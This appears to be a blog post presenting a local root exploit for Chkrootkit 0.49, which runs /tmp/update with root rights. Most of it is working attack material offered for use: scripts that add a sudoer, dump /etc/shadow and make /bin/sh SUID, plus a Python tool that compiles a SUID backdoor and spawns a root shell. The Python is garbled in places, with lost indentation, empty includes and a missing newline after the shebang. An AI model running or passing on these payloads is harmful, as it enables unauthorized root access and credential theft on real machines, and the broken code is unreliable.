Local root exploit in Chkrootkit

Hello !

Security researchers have found an local exploit for Chkrootkit 0.49 who allow to a simple user to make root’s commands (the current Chkrootkit version is 0.50)

Proof of concept

When Chkrootkit is executed a file ‘/tmp/update’ is executed with the permissions of user who launched Chkrootkit .
For launch Chkrootkit we use sudo for run it as superuser like this

sudo chkrootkit

if we run it as a simple user like this :

hd@kali:/root$ chkrootkit
chkrootkit need root privileges

We must run Chkrookit as root , so the file ‘/tmp/update’ too .
Now we can create ‘/tmp/update’ for become root .

Privileges escalation

Make a user sudoer

#!/bin/bash
adduser bob sudo

Read /etc/shadow

#!/bin/bash
cat /etc/shadow > /tmp/shadow

and you read /tmp/shadow .

Get a root shell

#!/bin/bash
chown root:root /bin/sh ; chmod 4777 /bin/sh

For get a root shell you must execute ‘/bin/sh’

bash-4.4$ whoami
hd
bash-4.4$ /bin/sh
# whoami
root
#

Don’t forget to chmod ‘tmp/update’

chmod +x /tmp/update

End


'/tmp/update' is executed every time when Chkrootkit is executed so check the cron for find when chkrootkit is launched .
After this the content of '/tmp/update' file will be executed and you can become root or make command as root .

Exploit's doc : https://www.exploit-db.com/exploits/33899/

I've made a tool in python to get r00t using this exploit

#!/usr/bin/python

import commands
import sys
import time
import os

chkrootkit = '/usr/sbin/chkrootkit'

print("[*] checking if chkrootkit is installed")
try:
if (os.path.exists(chkrootkit)) == True :
print ("[+] chkrootkit is installed ")
if (os.path.exists(chkrootkit)) == False :
print ("[-] chkrootkit isn't installed ")
except :
sys.exit("[-] chkrootkit is not installed")

print("[*] checking if chkrootkit's version is vulnerable")
sortie = (commands.getoutput("{} -V ".format(chkrootkit)))
if "0.49" in (sortie):
print("[+] chkrootkit is vulnerable")
elif not "0.49" in (sortie):
print("[-] chkrootkit is not vulnerable")
sys.exit()

print("[*] writting SUID executable ")
fichier = open("/var/tmp/suid.c","w")

#simple SUID backdoor
fichier.write("#include \n")
fichier.write("#include \n")
fichier.write("#include \n")
fichier.write("#include \n")
fichier.write("")
fichier.write("int main()\n")
fichier.write("{")
fichier.write("setuid(0);\n")
fichier.write('system("$SHELL");\n')
fichier.write("return 0;\n")
fichier.write("}\n")
fichier.close()

print("[*] compiling SUID executable")
os.system("gcc /var/tmp/suid.c -o /var/tmp/suid")
print("[*] exploit chkrootkit vulnerability ")
update = open("/tmp/update","w")
update.write("#!/bin/bash")
update.write("chown root:root /var/tmp/suid ; chmod 4755 /var/tmp/suid")
os.system("chmod +x /tmp/update")
print("")
print("")
print("[*] waiting 5 minutes before chkrootkit execute our backdoor with root permissions")
time.sleep(300)
if "-rwsr-xr-x" in (commands.getoutput("ls -lah /var/tmp/suid")) :
print("got r00t ? ")
os.system("/var/tmp/suid")
elif "-rwsr-xr-x" not in (commands.getoutput("ls -lah /var/tmp/suid")) :
print("""[-] chkrootkit wasn't executed by crontab in 5 minutes ... You need wait chkrootkit's execution by crontab then you execute /var/tmp/suid and you will get an root-shell """)
sys.exit()